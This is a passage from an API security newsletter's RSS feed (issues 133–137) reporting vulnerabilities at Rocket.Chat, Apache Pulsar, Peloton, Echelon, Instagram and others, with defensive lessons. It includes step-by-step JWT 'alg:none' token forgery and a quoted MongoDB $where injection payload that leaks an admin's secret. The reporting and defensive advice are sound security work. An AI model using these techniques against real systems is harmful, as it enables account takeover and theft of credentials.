<p>We have previously covered vulnerabilities in VMware vCenter in our issue <a href="https://apisecurity.io/issue-123-vmware-vcenter-rce-facebook-cache-server-issues-json-parsers-api-security-fixes-vs-code/" target="_blank" rel="noopener noreferrer">123</a>.</p>
<h2>Vulnerability: Apache Pulsar</h2>
<p>JSON Web Token (JWT) is one of the popular formats of API security tokens. This is a <code>Base64</code> encoded JSON structure that contains arbitrary claims (information about the token and the user) and that is signed to prevent token forgery.</p>
<p>Apache Pulsar has recently fixed <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22160" target="_blank" rel="noopener noreferrer">a JWT <code>alg:none</code> vulnerability (CVE-2021-22160) that allowed account takeovers</a>. Only systems that were configured to accept JWT (just one of the supported authentication schemes in Apache Pulsar) were vulnerable.</p>
<p>The <code>alg:none</code> attacks work as follows:</p>
<ol>
<li>Attackers take a valid token and decode it into JSON.</li>
<li>The attackers manipulate the claims in that JSON, for example, to grant themselves an administrative role, or change their ID to that of another user.</li>
<li>The attackers replace the original signing algorithm name in the JWT header with <code>"alg":"none"</code>, indicating that no signature algorithm is specified.</li>
<li>The attackers encode the JSON back to a token and include this newly forged token in the bearer header in their API calls.</li>
<li>If the API implementation is vulnerable, it blindly trusts the incoming  JWT header values, sees that no signature algorithm is specified, and accepts the unsigned, forged token without signature verification.</li>
</ol>
<p>We have covered JWT, JWT attacks, and the ways to protect against them in several of our previous issues. For example, see the recent webinar recording on JWT attacks and their remediation that we posted in <a href="https://apisecurity.io/issue-118-spring-framework-alps-oauth-2-0-attack-mindmap-securing-jwts/" target="_blank" rel="noopener noreferrer">issue 118</a>.</p>
<h2>Attack vectors: GraphQL and CSRF</h2>
<p>CSRF attacks occur when malicious sites or apps cause a web browser to perform an unwanted action on behalf of an authenticated user. Browser requests automatically include all cookies — including session cookies — and the site cannot distinguish between legitimate requests and forged requests.</p>
<p>GraphQL developers rarely consider CSRF but Tomasz Swiadek and Andrea Brancaleoni from Doyensec have found <a href="https://blog.doyensec.com/2021/05/20/graphql-csrf.html" target="_blank" rel="noopener noreferrer">a few scenarios when such vulnerabilities might exist</a>. They provide details on:</p>
<ul>
<li><code>POST</code>-based CSRF</li>
<li><code>GET</code>-based CSRF</li>
<li><code>XS-Search</code> attacks (when attackers can determine the existence of objects based on the speed of the response)</li>
</ul>
<p>Swiadek and Brancaleoni do promote their open-source GraphQL InQL Burp extension as a tool that can be used to locate such vulnerabilities.</p>
<p>Plus, finally, they give some advice from us on how to prevent CSRF attacks on GraphQL:</p>
<ul>
<li>Use modern frameworks with built-in CSRF protection.</li>
<li>Verify origins.</li>
<li>Double-submit cookies.</li>
<li>Base the protection on interaction with the user instead of under-the-hood processes.</li>
<li>Do not use <code>GET</code> requests for state-changing operations.</li>
<li>Make sure <code>GET</code> requests, too, are covered by enhanced CSRF protection.</li>
</ul>
<h2>Webinar: API Security in Postman</h2>
<p>Postman is a popular API testing tool. Next week, on June 16th, Postman&#8217;s Kin Lane and Isabelle Mauny from 42Crunch will be doing a webinar on how one can use 42Crunch API Security technology inside Postman.</p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_TQxgk1sYTVqvVrB5z0xTWg" target="_blank" rel="noopener noreferrer">See details and register here</a>.</p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_TQxgk1sYTVqvVrB5z0xTWg" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="size-full wp-image-8166 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/Postman-API-Security-webinar.jpg" alt="" width="600" height="338" /></a></p>
<h2>DZone meetup: Latest API Security Vulnerabilities and Q&amp;A</h2>
<p>Next Tuesday, DZone is hosting a virtual meetup in which we will go through a few of the recent API vulnerabilities and breaches from this newsletter, and answer any questions that you might have.</p>
<p><a href="https://dzone.com/articles/dzone-community-meetup-the-latest-api-security-vul" target="_blank" rel="noopener noreferrer">This will be live on DZone, Facebook, Twitter, Twitch, and LinkedIn</a>. See you there!</p>
<p><a href="https://dzone.com/articles/dzone-community-meetup-the-latest-api-security-vul" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class=" wp-image-8167 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/06/DZone-webinar-on-API-Security.jpg" alt="" width="600" height="337" /></a></p>
<h2>Market overview: API security</h2>
<p>As the readers of this newsletter know, API security is a hot market. Companies implementing API security programs have to separate the wheat of the marketing pitches of prospective vendors from the chaff of the reality of what the pushed products actually do.</p>
<p>Security researcher Alissa Knight recently dedicated her webcast to exactly that. See the recording of Alissa&#8217;s &#8220;API Threat Management Buyers Guide&#8221; (fast forward the first 10 minutes to get to the actual start):</p>
<p><a href="https://youtu.be/4X3ni0-4YWA?t=599">https://youtu.be/4X3ni0-4YWA?t=599</a></p>
<p>The post <a href="https://apisecurity.io/issue-137-vulnerabilities-vmware-vcenter-apache-pulsar-graphql-csrf-attacks/">Issue 137: Vulnerabilities in VMware vCenter and Apache Pulsar, GraphQL and CSRF attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 136: OAuth 2.0 security checklist and pentesting</title>
		<link>https://apisecurity.io/issue-136-oauth-2-0-security-checklist-pentesting/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 02 Jun 2021 22:00:37 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8127</guid>

					<description><![CDATA[<p>This week, we check out how API attacks can be used to squash political dissent, a handy OAuth 2.0 security checklist as well as some common OAuth vulnerabilities and the ways to detect and mitigate them, and a case study of API penetration testing. Vulnerability: Russian opposition email list breach Companies typically avoid providing details [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-136-oauth-2-0-security-checklist-pentesting/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-136-oauth-2-0-security-checklist-pentesting/">Issue 136: OAuth 2.0 security checklist and pentesting</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out how API attacks can be used to squash political dissent, a handy OAuth 2.0 security checklist as well as some common OAuth vulnerabilities and the ways to detect and mitigate them, and a case study of API penetration testing.</p>
<h2>Vulnerability: Russian opposition email list breach</h2>
<p>Companies typically avoid providing details on their data breaches. Today we have a rare exception. The staff of the Russian opposition leader, Alexey Navalny, has posted a detailed report on both the breach they had earlier this year and their investigation into the breach. Unfortunately, <a href="https://navalny.com/p/6490/" target="_blank" rel="noopener noreferrer">the report</a> is in Russian, so you might need to use Google Translate or auto-generated English subtitles in the video version that they posted on YouTube.</p>
<p>When Navalny got imprisoned earlier this year, his supporters set up a website to campaign for his release. The site collected supporters&#8217; email addresses and approximate postal addresses to be used to coordinate public protests across the country.</p>
<p>Right before the protests, attackers that are believed to be connected to the Russian government leaked the list of the email addresses. Later, they used the email addresses along with additional data from government sources (names, registration addresses, dates of birth, employer information) to intimidate the supporters and their employers. The consequences have been very real, with multiple reports of people losing their jobs as a result.</p>
<p>According to the investigation, attackers got in through the API of the mass email system, Mailgun, that the campaign used.</p>
<ol>
<li>One of the former administrators of the system (fired years before the breach) had retained an API key to Mailgun issued to the campaign.</li>
<li>The ex-admin used the API key for a scraping script to extract the email addresses from Mailgun. This script had built-in delays to avoid getting throttled or causing suspicious spikes, thus not raising an alarm.</li>
<li>Looks like there were early reports of the ex-admin possessing at least some of the email addresses as early as January this year, but the reports were ignored at that time.</li>
</ol>
<p>The investigators managed to correlate Mailgun logs and the leaked data to prove that this was indeed the system that was breached and that no other system or data got compromised.</p>
<p>Quite a few lessons learned here:</p>
<ul>
<li>Personally identifiable information (PII) can be extremely sensitive, and even just breached email addresses can lead to very tangible real-life consequences.</li>
<li>We live in a world in which breached PII can be augmented with data from other sources and thus further weaponized.</li>
<li>Long-living API keys are extremely dangerous and must be avoided. Use OAuth whenever possible, and frequently rotate API keys if not.</li>
<li>Limit API key access, issue the keys with minimal permissions, control which employees have access to the keys, deprovision the keys when employees who potentially have access to them depart the company.</li>
<li>Use IP whitelisting and check IP addresses in the logs to ensure that only the expected client call your APIs.</li>
<li>Monitor API logs.</li>
<li>Take any reports on data leaks seriously and investigate and treat them promptly.</li>
</ul>
<h2>OAuth2: Security checklist</h2>
<p>Researchers from Binary Brotherhood have taken IETF OAuth 2.0 Security Best Current Practice and added other common OAuth2 vulnerability lists that they found on the internet to compile their well-rounded OAuth 2.0 Pentest Checklist.</p>
<p><a href="https://www.binarybrotherhood.io/oauth2_threat_model.html" target="_blank" rel="noopener noreferrer">Check out their page</a> for the detailed checklist and links to additional resources.</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-8128" src="https://apisecurity.io/wp-content/uploads/2021/06/oauth2.0_security_testing_mindmap_main.png" alt="" width="1920" height="708" /></p>
<p>&nbsp;</p>
<h2>OAuth2: Common vulnerabilities and mitigation</h2>
<p>Nishith K has posted both an <a href="https://infosecwriteups.com/oauth-2-0-hacking-simplified-part-1-understanding-basics-ad323cb4a05c" target="_blank" rel="noopener noreferrer">introduction to OAuth 2.0</a> and <a href="https://infosecwriteups.com/oauth-2-0-hacking-simplified-part-2-vulnerabilities-and-mitigation-d01dd6d5fa2c" target="_blank" rel="noopener noreferrer">details on the following common vulnerabilities</a>:</p>
<ul>
<li>Improper implementation of the implicit grant type</li>
<li id="3801" class="hc hd dm he b hf jy hh hi hj jz hl hm hn ka hp hq hr kb ht hu hv kc hx hy hz jv jw jx ej" data-selectable-paragraph="">Flawed cross-site request forgery (CSRF) protection</li>
<li id="b192" class="hc hd dm he b hf jy hh hi hj jz hl hm hn ka hp hq hr kb ht hu hv kc hx hy hz jv jw jx ej" data-selectable-paragraph="">Leaking authorization codes and access tokens</li>
<li id="17b4" class="hc hd dm he b hf jy hh hi hj jz hl hm hn ka hp hq hr kb ht hu hv kc hx hy hz jv jw jx ej" data-selectable-paragraph="">Flawed scope validation</li>
<li id="50f6" class="hc hd dm he b hf jy hh hi hj jz hl hm hn ka hp hq hr kb ht hu hv kc hx hy hz jv jw jx ej" data-selectable-paragraph="">Unverified user registration</li>
<li id="6b03" class="hc hd dm he b hf jy hh hi hj jz hl hm hn ka hp hq hr kb ht hu hv kc hx hy hz jv jw jx ej" data-selectable-paragraph="">Host header injection</li>
<li id="964c" class="hc hd dm he b hf jy hh hi hj jz hl hm hn ka hp hq hr kb ht hu hv kc hx hy hz jv jw jx ej" data-selectable-paragraph="">Reusable OAuth access tokens</li>
</ul>
<h2>Best practices: Penetration testing case study</h2>
<p>A researcher going by the name of Bend Theory has posted <a href="https://bendtheory.medium.com/finding-and-exploiting-unintended-functionality-in-main-web-app-apis-6eca3ef000af" target="_blank" rel="noopener noreferrer">details on his API penetration testing process</a>:</p>
<ul>
<li>Google Dorking, or using Google search techniques to locate JavaScript and other files that contain API endpoint references</li>
<li>Using web apps in the browser while proxying calls through Burp</li>
<li>Analyzing JavaScript files and endpoints, including BurpJSLinkFinder plugin and Python scripts</li>
<li>Wordlists</li>
<li>CLI recon tools, such as gau, qsreplace, httpx, LinkFinder, dirsearch, ffuf, kiterunner, urlscan.io</li>
</ul>
<p>He then gives examples on the approach he used to discover a couple of recent real-life vulnerabilities:</p>
<ul>
<li>A profile access API call leaking user profile data due to BOLA/IDOR</li>
<li>API information disclosure and privilege escalation to administrative access</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-136-oauth-2-0-security-checklist-pentesting/">Issue 136: OAuth 2.0 security checklist and pentesting</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 135: Millions stolen from cryptoexchanges through APIs</title>
		<link>https://apisecurity.io/issue-135-millions-stolen-cryptoexchanges-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 26 May 2021 22:00:05 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8107</guid>

					<description><![CDATA[<p>This week, we take a look at how cybercriminals exploit leaked API keys to steal millions of dollars from cryptoexchanges. In addition, we also have the recent API vulnerabilities in Rocket.Chat, the upcoming change in Let&#8217;s Encrypt root certificate and its impact on APIs, and another video on common GraphQL API vulnerabilities. Vulnerability: API keys [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-135-millions-stolen-cryptoexchanges-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-135-millions-stolen-cryptoexchanges-apis/">Issue 135: Millions stolen from cryptoexchanges through APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at how cybercriminals exploit leaked API keys to steal millions of dollars from cryptoexchanges. In addition, we also have the recent API vulnerabilities in Rocket.Chat, the upcoming change in Let&#8217;s Encrypt root certificate and its impact on APIs, and another video on common GraphQL API vulnerabilities.</p>
<h2>Vulnerability: API keys and cryptoexchanges</h2>
<p>Researchers from CyberNews found how <a href="https://cybernews.com/security/report-how-cybercriminals-abuse-api-keys-to-steal-millions/" target="_blank" rel="noopener noreferrer">cybercriminals locate and exploit API keys from cryptocurrency exchanges to steal millions of dollars</a>.</p>
<p>Many users take advantage of various applications to make their cryptocurrency trades easier. To give these applications access to their cryptocurrency account, users give the apps their private API keys for the cryptoexchange.</p>
<p>Unfortunately, many applications (and users) do a poor job keeping these API keys safe. Some applications put them in unprotected environment variable files, or the keys end up in public GitHub repositories or S3 buckets. The API keys that researchers found in various public locations at the time of their research provided access to wallets with a total value of over a million dollars.</p>
<p>For security reasons, cryptoexchanges typically limit API key permissions. By default, the keys give access to data and trading operations, but the permission to withdraw money or transfer it to another wallet is not.</p>
<p>However, being infinitely ingenious as they are, cybercriminals have worked around that limitation. Instead of transferring the money out of an account directly, they use bots and controlled trade middlemen to manipulate the market and then use the trade permissions on the leaked or stolen API keys for massive simultaneous buy or sell orders in the cryptoexchange. These cause spikes and drops in the value of cryptocurrencies that criminals use to buy the assets cheaply or sell them at a premium (at the expense of the victims!), effectively ridding their victims of their account balances in a blink of an eye.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8110 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/cryptoexchange-sell-wall.jpg" alt="" width="750" height="564" /></p>
<p>Lessons learned here:</p>
<ul>
<li>Never underestimate cybercriminals: if there is profit to be made, they <em>will</em> find a way to take advantage of it.</li>
<li>Static, long-lived API keys are dangerous and should be avoided.</li>
<li>Additional measures must be taken to prevent API key reuse: mandatory IP whitelisting, mutual TLS authentication, tying the keys to specific API clients, and so on.</li>
<li>And, of course, API keys are <em>extremely sensitive secrets</em> and should be treated as such. Never, <em>ever</em>, store the keys in unprotected, accessible locations!</li>
</ul>
<h2>Vulnerability: Rocket.Chat</h2>
<p>Rocket.Chat is a popular open-source team communication software that has more than 12 million users worldwide and is deployed on over 800 000 servers.</p>
<p>Security researchers at SonarSource found <a href="https://blog.sonarsource.com/nosql-injections-in-rocket-chat" target="_blank" rel="noopener noreferrer">API vulnerabilities in Rocket.Chat that could be chained to take over an administrative account and lead to remote code execution</a>. In short:</p>
<ol>
<li style="list-style-type: none;">
<ol>
<li>Attackers locate the email address of a user account that does not have two-factor authentication (2FA) enabled. These tend to be regular users, not administrators.</li>
<li>Attackers send a password reset request (which inherently cannot require authentication) for that account. The request includes a parameter with a regular expression that causes a MongoDB NoSQL injection and allows them to retrieve the password reset token one character at a time. Once they know the full token, the attackers take over the user account and are now authenticated as the user.</li>
<li> The attackers use the account to invoke the API endpoint <code>/api/server/v1/users.js</code> and cause the top-level NoSQL operator <code>$where</code> to throw an error that leaks any user&#8217;s — including administrators — email, password hash, and 2FA secret.For example, this query would leaks an admin user’s secret:<code>{<span class="hljs-string">"$where"</span>:<span class="hljs-string">"this.username==='admin' &amp;&amp; (()=&gt;{ throw this.secret })()"</span>}</code>The API response for a call with this filter parameter would include the secret:
<pre><code class="python hljs">{
  <span class="hljs-string">"success"</span>: false,
  <span class="hljs-string">"error"</span>: <span class="hljs-string">"uncaught exception: aHR0cHM6Ly9iaXQubHkvM3VQclgwUA=="</span>
}</code></pre>
</li>
<li>The attackers take over an admin account they have now discovered.</li>
<li>The attackers have now access to perform remote code execution.</li>
</ol>
</li>
</ol>
<p>The root cause of the problem here boiled down to the fact API input was not validated, so researchers could send NoSQL injections, and initiate the whole chain of events. The fact that filtering was done with blocklists rather than allowlists did not help: it is much easier to miss something coming from outside, than when you can use your own definitions as a checklist.</p>
<p>You can see the attack in action in this quick video:</p>
<p><iframe loading="lazy" title="NoSQL Injections in Rocket Chat 3 12 1" width="640" height="360" src="https://www.youtube.com/embed/leuTzRVTICA?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>Lessons learned with this one:</p>
<ul>
<li>Strictly define and enforce all your API inputs.</li>
<li>Also define and enforce outputs, so attackers cannot cause your APIs to leak unexpected data.</li>
<li>Use allowlists rather than blocklists. Not only will that support you in locking down your inputs and outputs, but blocklists are also a lot less effective than allowlists.</li>
<li>Use 2FA whenever possible.</li>
</ul>
<h2>Heads-Up: Let&#8217;s Encrypt root certificate change</h2>
<p>Are you using Let&#8217;s Encrypt certificates for the HTTPS transport in your APIs? If so, you might need to update your clients.</p>
<p>The old Let&#8217;s Encrypt DST Root CA X3 root certificate will expire on September 30, 2021. This is not a problem for browsers, because all modern browsers include the current Let&#8217;s Encrypt ISRG Root X1 in their list of root certificates. However, API clients might not have that and thus might require a manual update.</p>
<p>If you use OpenSSL, you also need to make sure you are on OpenSSL 1.1.0 or later.</p>
<p>See <a href="https://letsencrypt.org/docs/dst-root-ca-x3-expiration-september-2021/" target="_blank" rel="noopener noreferrer">the announcement from Let&#8217;s Encrypt</a> for more details.</p>
<h2>Video: Offensive GraphQL API Exploitation</h2>
<p>&#8220;Offensive GraphQL API Exploitation&#8221; is a recording of the Red Team Village 2020 talk by Arun S. He discusses common security issues in GraphQL APIs and how attackers use them to attack the underlying infrastructure and ex-filtrate sensitive data:</p>
<p><iframe loading="lazy" title="Diana Initiative 2020 - Arun S - Offensive GraphQL API Exploitation" width="640" height="360" src="https://www.youtube.com/embed/eKj8F9bOOvk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-135-millions-stolen-cryptoexchanges-apis/">Issue 135: Millions stolen from cryptoexchanges through APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 134: API vulnerabilities at Echelon, Instagram, Facebook Workspace</title>
		<link>https://apisecurity.io/issue-134-api-vulnerabilities-echelon-instagram-facebook-workspace/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 19 May 2021 22:00:06 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8078</guid>

					<description><![CDATA[<p>This week, we have three API vulnerabilities: in Echelon sports equipment, Instagram, and Facebook Workspace, as well as an interview with Forrester&#8217;s key API security expert, Sandy Carielli. Vulnerability: Echelon In our previous newsletter, we discussed API vulnerabilities at Peloton. This week, the same researcher, Jan Masters from Pen Test Partners, has published his research [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-134-api-vulnerabilities-echelon-instagram-facebook-workspace/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-134-api-vulnerabilities-echelon-instagram-facebook-workspace/">Issue 134: API vulnerabilities at Echelon, Instagram, Facebook Workspace</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have three API vulnerabilities: in Echelon sports equipment, Instagram, and Facebook Workspace, as well as an interview with Forrester&#8217;s key API security expert, Sandy Carielli.</p>
<h2>Vulnerability: Echelon</h2>
<p>In our <a href="https://apisecurity.io/issue-133-vulnerable-peloton-apis-api-contract-generation-net/" target="_blank" rel="noopener noreferrer">previous newsletter</a>, we discussed API vulnerabilities at Peloton. This week, the same researcher, <a href="https://www.pentestpartners.com/security-blog/echelon-pii-leak-and-disclosure-fail/" target="_blank" rel="noopener noreferrer">Jan Masters from Pen Test Partners, has published his research on Peloton&#8217;s main competitor, Echelon</a>. Turns out that Echelon&#8217;s APIs were much worse, leaking a lot of very sensitive personal information of their users.</p>
<p>Their <code>GET /v1/user/<em>user_id</em></code> endpoint required authentication but had no authorization checks — a classical <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization (BOLA/IDOR) vulnerability</a>. As long as you had <em>any</em> account in the system, you could get the full details on any other user, such as their name, billing address, email, phone, age, gender, weight, birthday, equipment serial numbers, where they bought the equipment, subscription dates, workout stats and history&#8230; the list goes on.</p>
<p><img loading="lazy" decoding="async" class=" wp-image-8080 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/echelon_vuln_1.jpg" alt="" width="341" height="333" /><br />
<img loading="lazy" decoding="async" class=" wp-image-8079 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/echelon_vuln_2.jpg" alt="" width="467" height="267" /></p>
<p>Other vulnerabilities included:</p>
<ul>
<li>Unprotected API endpoint <code>/leaderboard</code> that exposed information on users participating in a particular exercise class, with no authentication required</li>
<li>Users searchable by their email address — dangerous because attackers could find a user by email and then extract the details using the already-mentioned BOLA issue</li>
<li>Metadata, such as the GPS coordinates, present in pictures uploaded by users</li>
</ul>
<p>Although the issues eventually got fixed, these are huge exposures. APIs must be designed with security in mind:</p>
<ul>
<li>Does your system really need to collect and exchange so much personal data?</li>
<li>Are all API endpoints protected with authentication?</li>
<li>Do all record access calls check whether the caller is authorized to access the record?</li>
</ul>
<h2>Vulnerability: Instagram</h2>
<p>Youssef Sammouda found <a href="https://ysamm.com/?p=684" target="_blank" rel="noopener noreferrer">an interesting Broken Functional-Level Authorization (BFLA) vulnerability in Instagram</a>:</p>
<ol>
<li>Attackers create an application as the attack vector.</li>
<li>The vector application prompts the victim user to grant it the Instagram <strong>Basic Display</strong> API level of access.<br />
<img loading="lazy" decoding="async" class="wp-image-8083 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/Instagram_granting_API_access.png" alt="" width="195" height="283" /></li>
<li>The victim is likely to accept the request, because the only mandatory access is to username and account type, so the request looks innocuous enough.</li>
<li>Instagram returns an access token to the vector application and thus to the attackers.</li>
<li>In reality, the returned token grants access also to the powerful GraphQL endpoint <code>graph[.]instagram[.]com/graphql</code>, which could, for example, allow attackers to take over the whole user account.</li>
</ol>
<p>Instagram has since fixed this vulnerability. Lessons learned here: ensure security scope enforcement across all your APIs!</p>
<h2>Vulnerability: Facebook Workspace</h2>
<p>Facebook Workplace is a Facebook product for enterprises, sort of internal Facebook focused on communications and collaboration between employees in the organization.</p>
<p>Facebook Workplace can be configured to allow employees within the approved corporate email domains to self-signup into the Workplace organization. <a href="https://mvinni.medium.com/workplace-by-facebook-unauthorized-access-to-companies-environment-27-5k-a593a57092f1" target="_blank" rel="noopener noreferrer">Marcos Ferreira found that the API behind the feature was vulnerable</a> and allowed anyone invite themselves to the organization.</p>
<p>Ferreira investigated the API call behind the sign-up request and found the parameters it used:<br />
<img loading="lazy" decoding="async" class="size-full wp-image-8085 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/facebook_workspace_signup_call.jpg" alt="" width="600" height="276" /></p>
<p>He found out that it was possible to modify the parameter <code>community_id</code>  and to create an account to any organization that had enabled self-signup, because the email address was not properly validated. Email addresses <em>outside</em> the approved corporate email domains would receive a one-time passcode and could register to the organization exactly like those <em>within</em> the domains.<span id="5c40" class="gj kl il fn km b dn kq kr ks kt ku ko s kp" data-selectable-paragraph=""></span></p>
<p>Ferreira received a hefty $27.5K reward for finding the vulnerability from Facebook, which naturally has taken the necessary steps to fix the issue.</p>
<p>Lessons learned in this one: APIs are your security boundary. Data validation needs to happen at the API level, not in web or mobile clients.</p>
<h2>Video: Forrester&#8217;s Sandy Carielli on API security</h2>
<p>Sandy Carielli is one of the leading Forrester analysts in the field of API security.</p>
<p>This week, at the (virtual) RSA Conference, she gave an interview to Matt Alderman, check out the recording below.</p>
<p>The topics of the interview ranged from the lessons learned from some of the recent API vulnerabilities and breaches, to common vulnerability patterns, and how API security spans the discovery, static, and dynamic testing of APIs, as well as their runtime protection.</p>
<p><iframe loading="lazy" title="API Security - Sandy Carielli - RSA21" width="640" height="360" src="https://www.youtube.com/embed/NooaLqVBpx4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-134-api-vulnerabilities-echelon-instagram-facebook-workspace/">Issue 134: API vulnerabilities at Echelon, Instagram, Facebook Workspace</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 133: Vulnerable Peloton APIs, API contract generation for .NET</title>
		<link>https://apisecurity.io/issue-133-vulnerable-peloton-apis-api-contract-generation-net/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 12 May 2021 22:00:04 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8059</guid>

					<description><![CDATA[<p>This week, we take a look at the API vulnerabilities discovered at Peloton, how India is locking down the APIs for their COVID vaccination portal, how API contracts can be generated from .NET code, and what API security sessions the upcoming RSA Conference (RSAC) offers. Vulnerability: Peloton Peloton is a producer of popular treadmills and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-133-vulnerable-peloton-apis-api-contract-generation-net/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-133-vulnerable-peloton-apis-api-contract-generation-net/">Issue 133: Vulnerable Peloton APIs, API contract generation for .NET</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the API vulnerabilities discovered at Peloton, how India is locking down the APIs for their COVID vaccination portal, how API contracts can be generated from .NET code, and what API security sessions the upcoming RSA Conference (RSAC) offers.</p>
<h2>Vulnerability: Peloton</h2>
<p>Peloton is a producer of popular treadmills and stationary bicycles, as wells as a subscription service for training on the equipment. <a href="https://www.pentestpartners.com/security-blog/tour-de-peloton-exposed-user-data/" target="_blank" rel="noopener noreferrer">Jan Masters from Pen Test Partners found that the APIs behind the service were highly vulnerable</a> and leaking personal user data.</p>
<p>The information that attackers could get included such details as:</p>
<ul>
<li>User IDs</li>
<li>Instructor IDs</li>
<li>Group membership</li>
<li>Location</li>
<li>Workout stats</li>
<li>Gender and age</li>
</ul>
<p>The APIs initially had no authentication at all, but it was silently added after Masters first contacted Peloton. However, there still was no authorization, so anyone with a Peloton ID (and there are more than 3 million of them, and you can self-register!) could still retrieve the data on any other user. This applied even to profiles set as private:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8062 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/05/peloton_api_response.jpg" alt="" width="1032" height="684" /></p>
<p>GraphQL vulnerabilities are also involved: besides the main APIs, there were also multiple unprotected GraphQL endpoints.</p>
<p>And, finally, the company could not provide information on whether or not the vulnerability was ever exploited by malicious actors.</p>
<p>Lessons learned:</p>
<ul>
<li>Keep an inventory of all your APIs — there should not be any APIs exposing your production data and systems unbeknownst to you.</li>
<li>All APIs must be protected with <em>both</em> authentication and authorization.</li>
<li>APIs must not expose more information than strictly necessary for the service or product calling to work properly.</li>
<li>Logging and monitoring become really valuable when a breach actually occurs.</li>
</ul>
<h2>API lockdown: Vaccination in India</h2>
<p>As you probably know, these are extremely challenging times in India. With the huge spike of COVID cases and overloaded medical systems, there has been a rush for vaccines. This has led to people finding the APIs behind India&#8217;s CoWIN vaccination booking portal.</p>
<p>The APIs were originally made public so that private hospitals could integrate them into their systems to facilitate faster vaccination. But with the scrambling for vaccinations, websites, Telegram bots, messenger groups, and so on got created to ping the APIs all the time to find free vaccination slots. As result, each time new slots appeared, they were rapidly taken. A technical capability quickly became a social and governance issue.</p>
<p><a href="https://techobserver.in/2021/05/08/cowin-portal-restricts-real-time-vaccination-slots-data-after-geeks-started-exploiting-api/" target="_blank" rel="noopener noreferrer">Now the CoWIN portal has locked down the API use</a>:</p>
<ul>
<li>Rate limit of 100 API calls per 5 minutes per IP address.</li>
<li>Automated bookings through bots or scripts are not possible since bookings can be done only through the CoWIN portal and require entering a one-time password that is sent to the user’s mobile phone.</li>
</ul>
<p>This is a story of unintended consequences of openness. APIs can be a great enabler, and these APIs were clearly created with the best of intentions. However, make sure that APIs that you create are limited to the target audience that you had in mind and have the security mechanisms (authentication, authorization, data validation, rate limiting, and so on) to protect the intended use.</p>
<p>And needless to say that our hearts go to the people of India and we hope that this crisis goes away as quickly as possible.</p>
<h2>Best practices: Generate OpenAPI from .NET annotations</h2>
<p>Code-first is the approach in which API contracts and documentation get generated based on the actual implementation code.</p>
